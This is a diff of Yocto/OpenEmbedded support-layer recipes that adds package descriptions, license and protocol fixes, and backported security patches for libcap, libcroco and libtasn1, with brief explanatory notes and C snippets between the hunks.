SUMMARY = "Library for ASN.1 and DER manipulation"
+DESCRIPTION = "A highly portable C library that encodes and decodes \
+DER/BER data following an ASN.1 schema. "
HOMEPAGE = "http://www.gnu.org/software/libtasn1/"
LICENSE = "GPLv3+ & LGPLv2.1+"
@@ -10,6 +12,7 @@ LIC_FILES_CHKSUM = "file://doc/COPYING;md5=d32239bcb673463ab874e80d47fae504 \
SRC_URI = "${GNU_MIRROR}/libtasn1/libtasn1-${PV}.tar.gz \
file://dont-depend-on-help2man.patch \
+ file://CVE-2021-46848.patch \
"
DEPENDS = "bison-native"
diff --git a/meta/recipes-support/gpgme/gpgme/0001-use-closefrom-on-linux-and-glibc-2.34.patch b/meta/recipes-support/gpgme/gpgme/0001-use-closefrom-on-linux-and-glibc-2.34.patch
new file mode 100644
index 0000000000..1c46684c6d
--- /dev/null
+++ b/meta/recipes-support/gpgme/gpgme/0001-use-closefrom-on-linux-and-glibc-2.34.patch
@@ -0,0 +1,24 @@
+From adb1d4e5498a19e9d591ac8f42f9ddfdb23a1354 Mon Sep 17 00:00:00 2001
+From: Khem Raj <raj.khem@gmail.com>
+Date: Thu, 15 Jul 2021 12:33:13 -0700
+Subject: [PATCH] use closefrom() on linux and glibc 2.34+
+
+Upstream-Status: Pending
+Signed-off-by: Khem Raj <raj.khem@gmail.com>
+---
+ src/posix-io.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/src/posix-io.c b/src/posix-io.c
+index e712ef2..ab8ded9 100644
+--- a/src/posix-io.c
++++ b/src/posix-io.c
+@@ -570,7 +570,7 @@ _gpgme_io_spawn (const char *path, char *const argv[], unsigned int flags,
+ if (fd_list[i].fd > fd)
+ fd = fd_list[i].fd;
+ fd++;
+-#if defined(__sun) || defined(__FreeBSD__)
++#if defined(__sun) || defined(__FreeBSD__) || (defined(__GLIBC__) && __GNUC_PREREQ(2, 34))
+ closefrom (fd);
+ max_fds = fd;
+ #else /*!__sun */
diff --git a/meta/recipes-support/gpgme/gpgme_1.13.1.bb b/meta/recipes-support/gpgme/gpgme_1.13.1.bb
index b51534351d..dacc9896e4 100644
--- a/meta/recipes-support/gpgme/gpgme_1.13.1.bb
+++ b/meta/recipes-support/gpgme/gpgme_1.13.1.bb
@@ -20,7 +20,8 @@ SRC_URI = "${GNUPG_MIRROR}/gpgme/${BP}.tar.bz2 \
file://0006-fix-build-path-issue.patch \
file://0007-python-Add-variables-to-tests.patch \
file://0008-do-not-auto-check-var-PYTHON.patch \
- "
+ file://0001-use-closefrom-on-linux-and-glibc-2.34.patch \
+ "
SRC_URI[md5sum] = "198f0a908ec3cd8f0ce9a4f3a4489645"
SRC_URI[sha256sum] = "c4e30b227682374c23cddc7fdb9324a99694d907e79242a25a4deeedb393be46"
@@ -49,7 +50,7 @@ DEFAULT_LANGUAGES_class-target = "cpp"
LANGUAGES ?= "${DEFAULT_LANGUAGES} python"
PYTHON_INHERIT = "${@bb.utils.contains('PACKAGECONFIG', 'python2', 'pythonnative', '', d)}"
-PYTHON_INHERIT .= "${@bb.utils.contains('PACKAGECONFIG', 'python3', 'python3native', '', d)}"
+PYTHON_INHERIT .= "${@bb.utils.contains('PACKAGECONFIG', 'python3', 'python3native python3targetconfig', '', d)}"
EXTRA_OECONF += '--enable-languages="${LANGUAGES}" \
--disable-gpgconf-test \
diff --git a/meta/recipes-support/icu/icu/0002-ICU-21175-Add-cnvalias-as-a-dependency-of-misc_res.patch b/meta/recipes-support/icu/icu/0002-ICU-21175-Add-cnvalias-as-a-dependency-of-misc_res.patch
new file mode 100644
index 0000000000..d7ddf33bce
--- /dev/null
+++ b/meta/recipes-support/icu/icu/0002-ICU-21175-Add-cnvalias-as-a-dependency-of-misc_res.patch
@@ -0,0 +1,24 @@
+From f2bc064e0d70ac068de4539d069bfab6cdccc48d Mon Sep 17 00:00:00 2001
+From: "Shane F. Carr" <shane@unicode.org>
+Date: Fri, 10 Jul 2020 14:28:22 -0500
+Subject: [PATCH] ICU-21175 Add cnvalias as a dependency of misc_res
+
+Upstream-Status: Backport [https://github.com/unicode-org/icu/commit/ee2d8b01034c3101de2bd58f9328daa076995e9e]
+Signed-off-by: Martin Jansa <Martin.Jansa@gmail.com>
+---
+ data/BUILDRULES.py | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/data/BUILDRULES.py b/data/BUILDRULES.py
+index 2338afd1f7..63b6e09273 100644
+--- a/data/BUILDRULES.py
++++ b/data/BUILDRULES.py
+@@ -361,7 +361,7 @@ def generate_misc(config, io, common_vars):
+ RepeatedExecutionRequest(
+ name = "misc_res",
+ category = "misc",
+- dep_targets = [],
++ dep_targets = [DepTarget("cnvalias")], # ICU-21175
+ input_files = input_files,
+ output_files = output_files,
+ tool = IcuTool("genrb"),
diff --git a/meta/recipes-support/icu/icu_66.1.bb b/meta/recipes-support/icu/icu_66.1.bb
index 08254648e4..6ba88595df 100644
--- a/meta/recipes-support/icu/icu_66.1.bb
+++ b/meta/recipes-support/icu/icu_66.1.bb
@@ -21,10 +21,11 @@ BASE_SRC_URI = "https://github.com/unicode-org/icu/releases/download/release-${I
DATA_SRC_URI = "https://github.com/unicode-org/icu/releases/download/release-${ICU_FOLDER}/icu4c-${ICU_PV}-data.zip"
SRC_URI = "${BASE_SRC_URI};name=code \
${DATA_SRC_URI};name=data \
+ file://0001-Fix-big-endian-build.patch;patchdir=${WORKDIR} \
+ file://0002-ICU-21175-Add-cnvalias-as-a-dependency-of-misc_res.patch;patchdir=${WORKDIR} \
file://filter.json \
file://icu-pkgdata-large-cmd.patch \
file://fix-install-manx.patch \
- file://0001-Fix-big-endian-build.patch;apply=no \
file://0001-icu-Added-armeb-support.patch \
file://CVE-2020-10531.patch \
"
@@ -47,7 +48,6 @@ do_make_icudata_class-target () {
cd ${S}
rm -rf data
cp -a ${WORKDIR}/data .
- patch -p1 < ${WORKDIR}/0001-Fix-big-endian-build.patch
${@bb.utils.contains('PACKAGECONFIG', 'make-icudata', '', 'exit 0', d)}
AR='${BUILD_AR}' \
CC='${BUILD_CC}' \
diff --git a/meta/recipes-support/iso-codes/iso-codes_4.4.bb b/meta/recipes-support/iso-codes/iso-codes_4.4.bb
index 4767dea84c..e8210eca9b 100644
--- a/meta/recipes-support/iso-codes/iso-codes_4.4.bb
+++ b/meta/recipes-support/iso-codes/iso-codes_4.4.bb
@@ -1,11 +1,14 @@
SUMMARY = "ISO language, territory, currency, script codes and their translations"
+DESCRIPTION = "Provides lists of various ISO standards (e.g. country, \
+language, language scripts, and currency names) in one place, rather \
+than repeated in many programs throughout the system."
HOMEPAGE = "https://salsa.debian.org/iso-codes-team/iso-codes"
BUGTRACKER = "https://salsa.debian.org/iso-codes-team/iso-codes/issues"
LICENSE = "LGPLv2.1"
LIC_FILES_CHKSUM = "file://COPYING;md5=4fbd65380cdd255951079008b364516c"
-SRC_URI = "git://salsa.debian.org/iso-codes-team/iso-codes.git;protocol=http;branch=main;"
+SRC_URI = "git://salsa.debian.org/iso-codes-team/iso-codes.git;protocol=https;branch=main;"
SRCREV = "38edb926592954b87eb527124da0ec68d2a748f3"
# inherit gettext cannot be used, because it adds gettext-native to BASEDEPENDS which
diff --git a/meta/recipes-support/itstool/itstool_2.0.6.bb b/meta/recipes-support/itstool/itstool_2.0.6.bb
index 5f358f463d..54105af5f0 100644
--- a/meta/recipes-support/itstool/itstool_2.0.6.bb
+++ b/meta/recipes-support/itstool/itstool_2.0.6.bb
@@ -1,4 +1,8 @@
SUMMARY = "ITS Tool allows you to translate your XML documents with PO files"
+DESCRIPTION = "It extracts messages from XML files and outputs PO template \
+files, then merges translations from MO files to create translated \
+XML files. It determines what to translate and how to chunk it into \
+messages using the W3C Internationalization Tag Set (ITS). "
HOMEPAGE = "http://itstool.org/"
LICENSE = "GPLv3"
LIC_FILES_CHKSUM = "file://COPYING;md5=59c57b95fd7d0e9e238ebbc7ad47c5a5"
diff --git a/meta/recipes-support/libassuan/libassuan_2.5.3.bb b/meta/recipes-support/libassuan/libassuan_2.5.3.bb
index 52b4c0f1b9..9ef5074120 100644
--- a/meta/recipes-support/libassuan/libassuan_2.5.3.bb
+++ b/meta/recipes-support/libassuan/libassuan_2.5.3.bb
@@ -1,4 +1,7 @@
SUMMARY = "IPC library used by GnuPG and GPGME"
+DESCRIPTION = "A small library implementing the so-called Assuan protocol. \
+This protocol is used for IPC between most newer GnuPG components. \
+Both, server and client side functions are provided. "
HOMEPAGE = "http://www.gnupg.org/related_software/libassuan/"
BUGTRACKER = "https://bugs.g10code.com/gnupg/index"
diff --git a/meta/recipes-support/libatomic-ops/libatomic-ops_7.6.10.bb b/meta/recipes-support/libatomic-ops/libatomic-ops_7.6.10.bb
index 7628eedb1b..3089d1f7ff 100644
--- a/meta/recipes-support/libatomic-ops/libatomic-ops_7.6.10.bb
+++ b/meta/recipes-support/libatomic-ops/libatomic-ops_7.6.10.bb
@@ -1,4 +1,5 @@
SUMMARY = "A library for atomic integer operations"
+DESCRIPTION = "Package provides semi-portable access to hardware-provided atomic memory update operations on a number of architectures."
HOMEPAGE = "https://github.com/ivmai/libatomic_ops/"
SECTION = "optional"
PROVIDES += "libatomics-ops"
diff --git a/meta/recipes-support/libbsd/libbsd_0.10.0.bb b/meta/recipes-support/libbsd/libbsd_0.10.0.bb
index 5b32b9af41..58925738cb 100644
--- a/meta/recipes-support/libbsd/libbsd_0.10.0.bb
+++ b/meta/recipes-support/libbsd/libbsd_0.10.0.bb
@@ -29,6 +29,12 @@ HOMEPAGE = "https://libbsd.freedesktop.org/wiki/"
# License: public-domain-Colin-Plumb
LICENSE = "BSD-3-Clause & BSD-4-Clause & ISC & PD"
LICENSE_${PN} = "BSD-3-Clause & ISC & PD"
+LICENSE:${PN}-dbg = "BSD-3-Clause & ISC & PD"
+LICENSE:${PN}-dev = "BSD-3-Clause & ISC & PD"
+LICENSE:${PN}-doc = "BSD-3-Clause & BSD-4-Clause & ISC & PD"
+LICENSE:${PN}-locale = "BSD-3-Clause & ISC & PD"
+LICENSE:${PN}-src = "BSD-3-Clause & ISC & PD"
+LICENSE:${PN}-staticdev = "BSD-3-Clause & ISC & PD"
LIC_FILES_CHKSUM = "file://COPYING;md5=2120be0173469a06ed185b688e0e1ae0"
SECTION = "libs"
diff --git a/meta/recipes-support/libcap/files/CVE-2023-2602.patch b/meta/recipes-support/libcap/files/CVE-2023-2602.patch
new file mode 100644
index 0000000000..ca04d7297a
--- /dev/null
+++ b/meta/recipes-support/libcap/files/CVE-2023-2602.patch
@@ -0,0 +1,52 @@
+Backport of:
+
+From bc6b36682f188020ee4770fae1d41bde5b2c97bb Mon Sep 17 00:00:00 2001
+From: "Andrew G. Morgan" <morgan@kernel.org>
+Date: Wed, 3 May 2023 19:18:36 -0700
+Subject: Correct the check of pthread_create()'s return value.
+
+This function returns a positive number (errno) on error, so the code
+wasn't previously freeing some memory in this situation.
+
+Discussion:
+
+ https://stackoverflow.com/a/3581020/14760867
+
+Credit for finding this bug in libpsx goes to David Gstir of
+X41 D-Sec GmbH (https://x41-dsec.de/) who performed a security
+audit of the libcap source code in April of 2023. The audit
+was sponsored by the Open Source Technology Improvement Fund
+(https://ostif.org/).
+
+Audit ref: LCAP-CR-23-01 (CVE-2023-2602)
+
+Signed-off-by: Andrew G. Morgan <morgan@kernel.org>
+
+Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/libcap2/tree/debian/patches/CVE-2023-2602.patch?h=ubuntu/focal-security
+Upstream commit https://git.kernel.org/pub/scm/libs/libcap/libcap.git/commit/?id=bc6b36682f188020ee4770fae1d41bde5b2c97bb]
+CVE: CVE-2023-2602
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ psx/psx.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+--- a/libcap/psx.c
++++ b/libcap/psx.c
+@@ -272,7 +272,7 @@ int psx_pthread_create(pthread_t *thread
+
+ psx_wait_for_idle();
+ int ret = pthread_create(thread, attr, start_routine, arg);
+- if (ret != -1) {
++ if (ret == 0) {
+ psx_do_registration(*thread);
+ }
+ psx_resume_idle();
+@@ -287,7 +287,7 @@ int __wrap_pthread_create(pthread_t *thr
+ void *(*start_routine) (void *), void *arg) {
+ psx_wait_for_idle();
+ int ret = __real_pthread_create(thread, attr, start_routine, arg);
+- if (ret != -1) {
++ if (ret == 0) {
+ psx_do_registration(*thread);
+ }
+ psx_resume_idle();
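
Note: the fix above relies on the documented contract of pthread_create(): it returns 0 on success and a positive error number on failure, never -1, so the old test 'ret != -1' treated every failure as success. A minimal usage sketch of the correct check (illustrative, not libcap code):

    #include <pthread.h>
    #include <stdio.h>
    #include <string.h>

    static void *worker(void *arg) { (void)arg; return NULL; }

    int main(void)
    {
        pthread_t tid;
        int ret = pthread_create(&tid, NULL, worker, NULL);
        if (ret == 0) {                /* success is exactly 0 */
            pthread_join(tid, NULL);
        } else {                       /* failure is a positive errno value */
            fprintf(stderr, "pthread_create: %s\n", strerror(ret));
        }
        return 0;
    }
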
diff --git a/meta/recipes-support/libcap/files/CVE-2023-2603.patch b/meta/recipes-support/libcap/files/CVE-2023-2603.patch
new file mode 100644
index 0000000000..cf86ac2a46
--- /dev/null
+++ b/meta/recipes-support/libcap/files/CVE-2023-2603.patch
@@ -0,0 +1,58 @@
+Backport of:
+
+From 422bec25ae4a1ab03fd4d6f728695ed279173b18 Mon Sep 17 00:00:00 2001
+From: "Andrew G. Morgan" <morgan@kernel.org>
+Date: Wed, 3 May 2023 19:44:22 -0700
+Subject: Large strings can confuse libcap's internal strdup code.
+
+Avoid something subtle with really long strings: 1073741823 should
+be enough for anybody. This is an improved fix over something attempted
+in libcap-2.55 to address some static analysis findings.
+
+Reviewing the library, cap_proc_root() and cap_launcher_set_chroot()
+are the only two calls where the library is potentially exposed to a
+user controlled string input.
+
+Credit for finding this bug in libcap goes to Richard Weinberger of
+X41 D-Sec GmbH (https://x41-dsec.de/) who performed a security audit
+of the libcap source code in April of 2023. The audit was sponsored
+by the Open Source Technology Improvement Fund (https://ostif.org/).
+
+Audit ref: LCAP-CR-23-02 (CVE-2023-2603)
+
+Signed-off-by: Andrew G. Morgan <morgan@kernel.org>
+
+Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/libcap2/tree/debian/patches/CVE-2023-2603.patch?h=ubuntu/focal-security
+Upstream commit https://git.kernel.org/pub/scm/libs/libcap/libcap.git/commit/?id=422bec25ae4a1ab03fd4d6f728695ed279173b18]
+CVE: CVE-2023-2603
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ libcap/cap_alloc.c | 12 +++++++-----
+ 1 file changed, 7 insertions(+), 5 deletions(-)
+
+--- a/libcap/cap_alloc.c
++++ b/libcap/cap_alloc.c
+@@ -76,13 +76,22 @@ cap_t cap_init(void)
+ char *_libcap_strdup(const char *old)
+ {
+ __u32 *raw_data;
++ size_t len;
+
+ if (old == NULL) {
+ errno = EINVAL;
+ return NULL;
+ }
+
+- raw_data = malloc( sizeof(__u32) + strlen(old) + 1 );
++ len = strlen(old);
++ if ((len & 0x3fffffff) != len) {
++ _cap_debug("len is too long for libcap to manage");
++ errno = EINVAL;
++ return NULL;
++ }
++ len += sizeof(__u32) + 1;
++
++ raw_data = malloc(len);
+ if (raw_data == NULL) {
+ errno = ENOMEM;
+ return NULL;
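
Note: the guard added above, '(len & 0x3fffffff) != len', rejects any input of 2^30 bytes or more before 'sizeof(__u32) + len + 1' is formed, so the later size arithmetic cannot wrap. A small standalone sketch of the same idea (hypothetical limit name, not libcap code):

    #include <stdint.h>
    #include <stdio.h>
    #include <string.h>

    #define LEN_LIMIT_MASK 0x3fffffffu     /* accept lengths below 2^30 only */

    static int checked_alloc_size(const char *s, size_t *out)
    {
        size_t len = strlen(s);
        if ((len & LEN_LIMIT_MASK) != len) /* len >= 2^30: refuse */
            return -1;
        *out = sizeof(uint32_t) + len + 1; /* cannot overflow now */
        return 0;
    }

    int main(void)
    {
        size_t n;
        if (checked_alloc_size("hello", &n) == 0)
            printf("would allocate %zu bytes\n", n);
        return 0;
    }
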
diff --git a/meta/recipes-support/libcap/libcap_2.32.bb b/meta/recipes-support/libcap/libcap_2.32.bb
index d78a58f7d2..64d5190aa7 100644
--- a/meta/recipes-support/libcap/libcap_2.32.bb
+++ b/meta/recipes-support/libcap/libcap_2.32.bb
@@ -1,8 +1,10 @@
SUMMARY = "Library for getting/setting POSIX.1e capabilities"
+DESCRIPTION = "A library providing the API to access POSIX capabilities. \
+These allow giving various kinds of specific privileges to individual \
+users, without giving them full root permissions."
HOMEPAGE = "http://sites.google.com/site/fullycapable/"
-
# no specific GPL version required
-LICENSE = "BSD | GPLv2"
+LICENSE = "BSD-3-Clause | GPLv2"
LIC_FILES_CHKSUM = "file://License;md5=3f84fd6f29d453a56514cb7e4ead25f1"
DEPENDS = "hostperl-runtime-native gperf-native"
@@ -11,6 +13,8 @@ SRC_URI = "${KERNELORG_MIRROR}/linux/libs/security/linux-privs/${BPN}2/${BPN}-${
file://0001-ensure-the-XATTR_NAME_CAPS-is-defined-when-it-is-use.patch \
file://0002-tests-do-not-run-target-executables.patch \
file://0001-tests-do-not-statically-link-a-test.patch \
+ file://CVE-2023-2602.patch \
+ file://CVE-2023-2603.patch \
"
SRC_URI[md5sum] = "7416119c9fdcfd0e8dd190a432c668e9"
SRC_URI[sha256sum] = "1005e3d227f2340ad1e3360ef8b69d15e3c72a29c09f4894d7aac038bd26e2be"
diff --git a/meta/recipes-support/libcheck/libcheck_0.14.0.bb b/meta/recipes-support/libcheck/libcheck_0.14.0.bb
index a88f009cdb..57963d83d4 100644
--- a/meta/recipes-support/libcheck/libcheck_0.14.0.bb
+++ b/meta/recipes-support/libcheck/libcheck_0.14.0.bb
@@ -1,4 +1,9 @@
SUMMARY = "Check - unit testing framework for C code"
+DESCRIPTION = "It features a simple interface for defining unit tests, \
+putting little in the way of the developer. Tests are run in a separate \
+address space, so both assertion failures and code errors that cause \
+segmentation faults or other signals can be caught. Test results are \
+reportable in the following: Subunit, TAP, XML, and a generic logging format."
HOMEPAGE = "https://libcheck.github.io/check/"
SECTION = "devel"
diff --git a/meta/recipes-support/libcroco/files/CVE-2020-12825.patch b/meta/recipes-support/libcroco/files/CVE-2020-12825.patch
new file mode 100644
index 0000000000..42f92e3607
--- /dev/null
+++ b/meta/recipes-support/libcroco/files/CVE-2020-12825.patch
@@ -0,0 +1,192 @@
+From fdf78a4877afa987ba646a8779b513f258e6d04c Mon Sep 17 00:00:00 2001
+From: Michael Catanzaro <mcatanzaro@gnome.org>
+Date: Fri, 31 Jul 2020 15:21:53 -0500
+Subject: [PATCH] libcroco: Limit recursion in block and any productions
+
+ (CVE-2020-12825)
+
+If we don't have any limits, we can recurse forever and overflow the
+stack.
+
+Fixes #8
+This is per https://gitlab.gnome.org/Archive/libcroco/-/issues/8
+
+https://gitlab.gnome.org/GNOME/gnome-shell/-/merge_requests/1404
+
+CVE: CVE-2020-12825
+Upstream-Status: Backport [https://gitlab.gnome.org/Archive/libcroco/-/commit/6eb257e5c731c691eb137fca94e916ca73941a5a]
+Comment: No refreshing changes done.
+Signed-off-by: Saloni Jain <Saloni.Jain@kpit.com>
+
+---
+ src/cr-parser.c | 44 +++++++++++++++++++++++++++++---------------
+ 1 file changed, 29 insertions(+), 15 deletions(-)
+
+diff --git a/src/cr-parser.c b/src/cr-parser.c
+index 18c9a01..f4a62e3 100644
+--- a/src/cr-parser.c
++++ b/src/cr-parser.c
+@@ -136,6 +136,8 @@ struct _CRParserPriv {
+
+ #define CHARS_TAB_SIZE 12
+
++#define RECURSIVE_CALLERS_LIMIT 100
++
+ /**
+ * IS_NUM:
+ *@a_char: the char to test.
+@@ -344,9 +346,11 @@ static enum CRStatus cr_parser_parse_selector_core (CRParser * a_this);
+
+ static enum CRStatus cr_parser_parse_declaration_core (CRParser * a_this);
+
+-static enum CRStatus cr_parser_parse_any_core (CRParser * a_this);
++static enum CRStatus cr_parser_parse_any_core (CRParser * a_this,
++ guint n_calls);
+
+-static enum CRStatus cr_parser_parse_block_core (CRParser * a_this);
++static enum CRStatus cr_parser_parse_block_core (CRParser * a_this,
++ guint n_calls);
+
+ static enum CRStatus cr_parser_parse_value_core (CRParser * a_this);
+
+@@ -784,7 +788,7 @@ cr_parser_parse_atrule_core (CRParser * a_this)
+ cr_parser_try_to_skip_spaces_and_comments (a_this);
+
+ do {
+- status = cr_parser_parse_any_core (a_this);
++ status = cr_parser_parse_any_core (a_this, 0);
+ } while (status == CR_OK);
+
+ status = cr_tknzr_get_next_token (PRIVATE (a_this)->tknzr,
+@@ -795,7 +799,7 @@ cr_parser_parse_atrule_core (CRParser * a_this)
+ cr_tknzr_unget_token (PRIVATE (a_this)->tknzr,
+ token);
+ token = NULL;
+- status = cr_parser_parse_block_core (a_this);
++ status = cr_parser_parse_block_core (a_this, 0);
+ CHECK_PARSING_STATUS (status,
+ FALSE);
+ goto done;
+@@ -930,11 +934,11 @@ cr_parser_parse_selector_core (CRParser * a_this)
+
+ RECORD_INITIAL_POS (a_this, &init_pos);
+
+- status = cr_parser_parse_any_core (a_this);
++ status = cr_parser_parse_any_core (a_this, 0);
+ CHECK_PARSING_STATUS (status, FALSE);
+
+ do {
+- status = cr_parser_parse_any_core (a_this);
++ status = cr_parser_parse_any_core (a_this, 0);
+
+ } while (status == CR_OK);
+
+@@ -956,10 +960,12 @@ cr_parser_parse_selector_core (CRParser * a_this)
+ *in chapter 4.1 of the css2 spec.
+ *block ::= '{' S* [ any | block | ATKEYWORD S* | ';' ]* '}' S*;
+ *@param a_this the current instance of #CRParser.
++ *@param n_calls used to limit recursion depth
+ *FIXME: code this function.
+ */
+ static enum CRStatus
+-cr_parser_parse_block_core (CRParser * a_this)
++cr_parser_parse_block_core (CRParser * a_this,
++ guint n_calls)
+ {
+ CRToken *token = NULL;
+ CRInputPos init_pos;
+@@ -967,6 +973,9 @@ cr_parser_parse_block_core (CRParser * a_this)
+
+ g_return_val_if_fail (a_this && PRIVATE (a_this), CR_BAD_PARAM_ERROR);
+
++ if (n_calls > RECURSIVE_CALLERS_LIMIT)
++ return CR_ERROR;
++
+ RECORD_INITIAL_POS (a_this, &init_pos);
+
+ status = cr_tknzr_get_next_token (PRIVATE (a_this)->tknzr, &token);
+@@ -996,13 +1005,13 @@ cr_parser_parse_block_core (CRParser * a_this)
+ } else if (token->type == CBO_TK) {
+ cr_tknzr_unget_token (PRIVATE (a_this)->tknzr, token);
+ token = NULL;
+- status = cr_parser_parse_block_core (a_this);
++ status = cr_parser_parse_block_core (a_this, n_calls + 1);
+ CHECK_PARSING_STATUS (status, FALSE);
+ goto parse_block_content;
+ } else {
+ cr_tknzr_unget_token (PRIVATE (a_this)->tknzr, token);
+ token = NULL;
+- status = cr_parser_parse_any_core (a_this);
++ status = cr_parser_parse_any_core (a_this, n_calls + 1);
+ CHECK_PARSING_STATUS (status, FALSE);
+ goto parse_block_content;
+ }
+@@ -1109,7 +1118,7 @@ cr_parser_parse_value_core (CRParser * a_this)
+ status = cr_tknzr_unget_token (PRIVATE (a_this)->tknzr,
+ token);
+ token = NULL;
+- status = cr_parser_parse_block_core (a_this);
++ status = cr_parser_parse_block_core (a_this, 0);
+ CHECK_PARSING_STATUS (status, FALSE);
+ ref++;
+ goto continue_parsing;
+@@ -1123,7 +1132,7 @@ cr_parser_parse_value_core (CRParser * a_this)
+ status = cr_tknzr_unget_token (PRIVATE (a_this)->tknzr,
+ token);
+ token = NULL;
+- status = cr_parser_parse_any_core (a_this);
++ status = cr_parser_parse_any_core (a_this, 0);
+ if (status == CR_OK) {
+ ref++;
+ goto continue_parsing;
+@@ -1162,10 +1171,12 @@ cr_parser_parse_value_core (CRParser * a_this)
+ * | FUNCTION | DASHMATCH | '(' any* ')' | '[' any* ']' ] S*;
+ *
+ *@param a_this the current instance of #CRParser.
++ *@param n_calls used to limit recursion depth
+ *@return CR_OK upon successfull completion, an error code otherwise.
+ */
+ static enum CRStatus
+-cr_parser_parse_any_core (CRParser * a_this)
++cr_parser_parse_any_core (CRParser * a_this,
++ guint n_calls)
+ {
+ CRToken *token1 = NULL,
+ *token2 = NULL;
+@@ -1174,6 +1185,9 @@ cr_parser_parse_any_core (CRParser * a_this)
+
+ g_return_val_if_fail (a_this, CR_BAD_PARAM_ERROR);
+
++ if (n_calls > RECURSIVE_CALLERS_LIMIT)
++ return CR_ERROR;
++
+ RECORD_INITIAL_POS (a_this, &init_pos);
+
+ status = cr_tknzr_get_next_token (PRIVATE (a_this)->tknzr, &token1);
+@@ -1212,7 +1226,7 @@ cr_parser_parse_any_core (CRParser * a_this)
+ *We consider parameter as being an "any*" production.
+ */
+ do {
+- status = cr_parser_parse_any_core (a_this);
++ status = cr_parser_parse_any_core (a_this, n_calls + 1);
+ } while (status == CR_OK);
+
+ ENSURE_PARSING_COND (status == CR_PARSING_ERROR);
+@@ -1237,7 +1251,7 @@ cr_parser_parse_any_core (CRParser * a_this)
+ }
+
+ do {
+- status = cr_parser_parse_any_core (a_this);
++ status = cr_parser_parse_any_core (a_this, n_calls + 1);
+ } while (status == CR_OK);
+
+ ENSURE_PARSING_COND (status == CR_PARSING_ERROR);
+@@ -1265,7 +1279,7 @@ cr_parser_parse_any_core (CRParser * a_this)
+ }
+
+ do {
+- status = cr_parser_parse_any_core (a_this);
++ status = cr_parser_parse_any_core (a_this, n_calls + 1);
+ } while (status == CR_OK);
+
+ ENSURE_PARSING_COND (status == CR_PARSING_ERROR);
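
Note: the pattern above threads an explicit depth counter through the mutually recursive parser productions and gives up once RECURSIVE_CALLERS_LIMIT is exceeded, so hostile input can no longer exhaust the stack. A minimal sketch of the same depth-limited recursion on a toy grammar (illustrative only, not libcroco code):

    #include <stdio.h>

    #define RECURSION_LIMIT 100

    /* Parse nested parentheses, failing instead of overflowing the
     * stack when nesting exceeds RECURSION_LIMIT. */
    static int parse_parens(const char **p, unsigned depth)
    {
        if (depth > RECURSION_LIMIT)
            return -1;                     /* too deep: bail out cleanly */
        while (**p == '(') {
            (*p)++;
            if (parse_parens(p, depth + 1) < 0)
                return -1;
            if (**p != ')')
                return -1;
            (*p)++;
        }
        return 0;
    }

    int main(void)
    {
        const char *input = "((()))";
        printf("%s\n", parse_parens(&input, 0) == 0 ? "ok" : "rejected");
        return 0;
    }
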
diff --git a/meta/recipes-support/libcroco/libcroco_0.6.13.bb b/meta/recipes-support/libcroco/libcroco_0.6.13.bb
index 9171a9de5c..66ee647ffa 100644
--- a/meta/recipes-support/libcroco/libcroco_0.6.13.bb
+++ b/meta/recipes-support/libcroco/libcroco_0.6.13.bb
@@ -1,4 +1,7 @@
SUMMARY = "Cascading Style Sheet (CSS) parsing and manipulation toolkit"
+DESCRIPTION = "The Libcroco project is an effort to build a generic \
+Cascading Style Sheet (CSS) parsing and manipulation toolkit that can be \
+used by GNOME applications in need of CSS support."
HOMEPAGE = "http://www.gnome.org/"
BUGTRACKER = "https://bugzilla.gnome.org/"
@@ -18,3 +21,6 @@ inherit gnomebase gtk-doc binconfig-disabled
SRC_URI[archive.md5sum] = "c80c5a8385011a0260dce6bd0da93dce"
SRC_URI[archive.sha256sum] = "767ec234ae7aa684695b3a735548224888132e063f92db585759b422570621d4"
+
+SRC_URI +="file://CVE-2020-12825.patch \
+"
diff --git a/meta/recipes-support/libdaemon/libdaemon_0.14.bb b/meta/recipes-support/libdaemon/libdaemon_0.14.bb
index 070ee1890e..85a30bcac3 100644
--- a/meta/recipes-support/libdaemon/libdaemon_0.14.bb
+++ b/meta/recipes-support/libdaemon/libdaemon_0.14.bb
@@ -1,4 +1,8 @@
SUMMARY = "Lightweight C library which eases the writing of UNIX daemons"
+DESCRIPTION = "Lightweight daemon framework for OpenBSD. It provides \
+facilities for logging and a signal handler to enable graceful shutdown, \
+as well as file locking to ensure that only a single copy of a given daemon \
+is running at a time."
SECTION = "libs"
AUTHOR = "Lennart Poettering <lennart@poettering.net>"
HOMEPAGE = "http://0pointer.de/lennart/projects/libdaemon/"
diff --git a/meta/recipes-support/libevdev/libevdev/determinism.patch b/meta/recipes-support/libevdev/libevdev/determinism.patch
index 33a6076b78..06128a8e7e 100644
--- a/meta/recipes-support/libevdev/libevdev/determinism.patch
+++ b/meta/recipes-support/libevdev/libevdev/determinism.patch
@@ -4,7 +4,8 @@ Sort to remove this inconsistency.
RP 2020/2/7
Signed-off-by: Richard Purdie <richard.purdie@linuxfoundation.org>
-Upstream-Status: Pending
+Submitted: https://lists.freedesktop.org/archives/input-tools/2021-February/001560.html
+Upstream-Status: Backport [https://gitlab.freedesktop.org/libevdev/libevdev/-/commit/8d70f449892c6f7659e07bb0f06b8347677bb7d8]
Index: a/libevdev/make-event-names.py
===================================================================
diff --git a/meta/recipes-support/libevdev/libevdev_1.8.0.bb b/meta/recipes-support/libevdev/libevdev_1.8.0.bb
index 3523dc0968..fd7dd15c26 100644
--- a/meta/recipes-support/libevdev/libevdev_1.8.0.bb
+++ b/meta/recipes-support/libevdev/libevdev_1.8.0.bb
@@ -1,4 +1,7 @@
SUMMARY = "Wrapper library for evdev devices"
+DESCRIPTION = "A library for handling evdev kernel devices. It abstracts \
+the evdev ioctls through type-safe interfaces and provides functions \
+to change the appearance of the device."
HOMEPAGE = "http://www.freedesktop.org/wiki/Software/libevdev/"
SECTION = "libs"
diff --git a/meta/recipes-support/libevent/libevent/0002-test-regress.h-Increase-default-timeval-tolerance-50.patch b/meta/recipes-support/libevent/libevent/0002-test-regress.h-Increase-default-timeval-tolerance-50.patch
new file mode 100644
index 0000000000..0b20eda3c0
--- /dev/null
